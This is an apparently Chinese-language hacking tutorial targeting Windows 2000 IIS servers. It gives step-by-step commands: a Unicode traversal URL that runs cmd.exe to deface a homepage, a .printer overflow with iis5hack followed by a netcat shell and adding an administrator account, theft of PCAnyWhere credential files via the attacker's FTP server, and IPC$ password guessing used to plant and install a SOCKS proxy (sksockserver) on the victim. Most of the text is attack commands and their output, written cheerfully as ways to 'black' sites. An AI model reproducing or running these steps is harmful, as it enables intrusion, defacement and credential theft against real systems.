Pinging www.xxx.com [xxx.xxx.xxx.xxx] with 32 bytes of data:
Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116
Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 120ms, Maximum = 630ms, Average = 187ms
所以我们如果要echo和>的结合使用,就应该这样输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd\".exe?/c+echo+Hacked By Nature+> c:\\inetpub\\wwwroot\\index.html (注意:这两个命令的区别是,后一个比前一个在cmd后多了一个\"符号),完成后看它的主页已经被修改成了:Hacked By Nature 了。其实只要我们弄懂这个漏洞的使用,仅仅使用IE,我们就可以“黑”掉一个网站咯!就这么简单!
3.idq.dll缓冲区溢出漏洞。作为安装过程的一部分,IIS 安装了几个 ISAPI 扩展 .dlls 。其中的 idq.dll 存在问题,它是 Index Server 的一个组件,对管理员脚本(.ida文件)和Internet数据查询 (.idq文件)提供支持。但是,idq.dll 在处理一段URL输入的代码中存在一个未经检查的缓冲区。攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出,从而执行自己提供的代码。而更为严重的是,idq.dll 是以 SYSTEM 身份运行的,攻击者成功利用此漏洞后能取得系统管理员权限。(SYSTEM权限相当于超级管理员权限,很值得注意!)Windows 2k和NT都受到了不同程度的影响。
3.IIS.printer漏洞实战篇(用到的程序有:IIS5hack(.printer溢出工具), Netcat(即NC) 。有关IIS5HACK的用法参见帮助。)
关于IIS5HACK程序中部分单词解释:Host:溢出主机的IP地址。HostPort:主机端口。HostType:主机操作系统类型。ShellPort:溢出的端口
现在我们开始吧。假设目标主机为2K系统,且存在IIS.printer漏洞。示例如下:
C:\\>iis5hack xxx.xxx.xxx.xxx 80 1 3739
IIS5 remote .printer overflow. writen by sunx http://www.sunx.org
for test only, dont used to hack, :p
Listn: 80
connecting...
sending...
Now you can telnet to 3739 port
good luck :)
OK!溢出成功!接着用NC连接它的3739端口:
C:\\>nc xxx.xxx.xxx.xxx 3739 http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
net user Nature 123456 /add <-------------------------添加一个名字为Nature,密码为1234567890的用户
net localgroup administrators Nature /add <-----------把你刚才添加的Nature用户加到管理员组里,你也是管理员了哦!~~~~~~
b.SQL空密码结合PCAnyWhere获得目标主机的完全管理权
检查一下目标主机是否开有5631端口,如果有的话,说明目标主机有PCAnyWhere远程管理,如果取得他的帐号和密码,我们不就是可以用PcAnyWhere来远程管理目标主机了吗?!默认情况下,PCAnyWhere安装于c:\\Program Files目录下,其data目录下的.cif文件中保存着加密过的帐号和密码。只要得到此文件,就可以用流光自带的PCAnyWhere密码文件解码器来快速解出密码了!用流光扫描该主机,如果有PCAnyWhere文件,那么在流光主机详细列表中就会有主机名了。点击该主机后,流光会有连接提示,点击后即可出现连接对话框。在其中填上你的WEB服务器(可以是免费空间)的ftp地址,用户名和密码,点击确定,过一会,流光会提示上传成功。我们再从我们的个人主页上将那个.cif文件下载下来。然后在流光中按Ctrl+T调出文件选择框,选中那个.cif文件,单击确定,流光的PCAnyWhere密码文件解码器就会很快解出密码!现在打开PCAnyWhere Manager,建立一个指向xxx.xxx.xxx.xxx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:xxx.xxx.xxx.xxx ,选中login information项中的automatically login to host up connection ,并在下面的login name和password栏中填入刚才得到的用户名和密码,确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。呵呵!又搞定咯!抓抓里面的好东东吧!
4.IPC$共享弱密码漏洞篇(用到的软件:流光FluxayIV,srv.exe、ntlm.exe流光的tools目录下有)
IPC$是Windows的默认共享。我们可以用主机的管理员用户名和密码连接。其实,这个共享并没有什么漏洞。问题就出在管理员密码上了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。而这就是个致命的共享漏洞。我们可以通过猜解管理员的密码,得到目标主机的超级管理员权限, 就可以将目标主机完全控制了!呵呵!是不是很惊讶?来吧,开始入侵!Go Go Go !!!
C:\\>copy c:\\snake\\Sksockserver.exe \\\\xxx.xxx.xxx.xxx\\c$\\admin$ <----------------将sksockserver.exe拷贝到目标主机
C:\\>telnet xxx.xxx.xxx.xxx <------------------------telnet到目标主机上去。如果没开telnet,参见上文打开telnet服务
Microsoft (R) Windows 2000 (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Client
Telnet Client Build 5.00.99203.1
Escape Character is \'CTRL+]\'
You are about to send your password information to a remote computer
in Internet zone. This might not be safe. Do you want to send it anyway(y/n):y
NTLM Authentication failed due to insufficient credentials.
Please login with
clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:administrator
password: ********** <-----------------------------此处输入你得到的管理员的密码
*==========================================================
Microsoft Telnet
*==========================================================
C:\\> <---------------------------------------------登陆成功了,现在要安装sksockserver程序了!
C:\\>sksockserver.exe <-----------------------------不带任何参数就会显示帮助文档。好好看看吧!
SkServer - is freeware, All Rights Reserved by snake.2001.
Run with paramater below list:
-Install (Install the service)
-Remove (Remove the service)
-Debug 1813 (Run as console program at port 1813)
~ Next are about service registry value setting ~
-config Show [Port/StartType/Client/SkServer] (Show current config)
-config Port [NewPort] (Set/Show SkServer\'s Port)
-config StartType [1~3] (Set/Show StartType)
( 2-Auto, 3-Manual, 4-Disable)
-config Client [add/del/change] [IP Mask Enable]
(Show/add/del/change Client Set)
-config SkServer [add/del/change] [IP Port Enable]
(Show/add/del/change Pass Skserver Set)
C:\\>sksockserver -install <------------------------好的,现在开始安装!
如果你想来个连跳,那么安装后还要做一下设置。先看看默认设置情况:
C:\\>sksockserver -config show
SkServer Port = 1080 <-----------------------------开放服务的端口
SkServer StartType: 3 - Manual <-------------------服务启动方式
SkServer Enable Client Set Num:0 <-----------------客户端的项目个数
SkServer Pass SkServer Number:0 <------------------经过SkServer的项目个数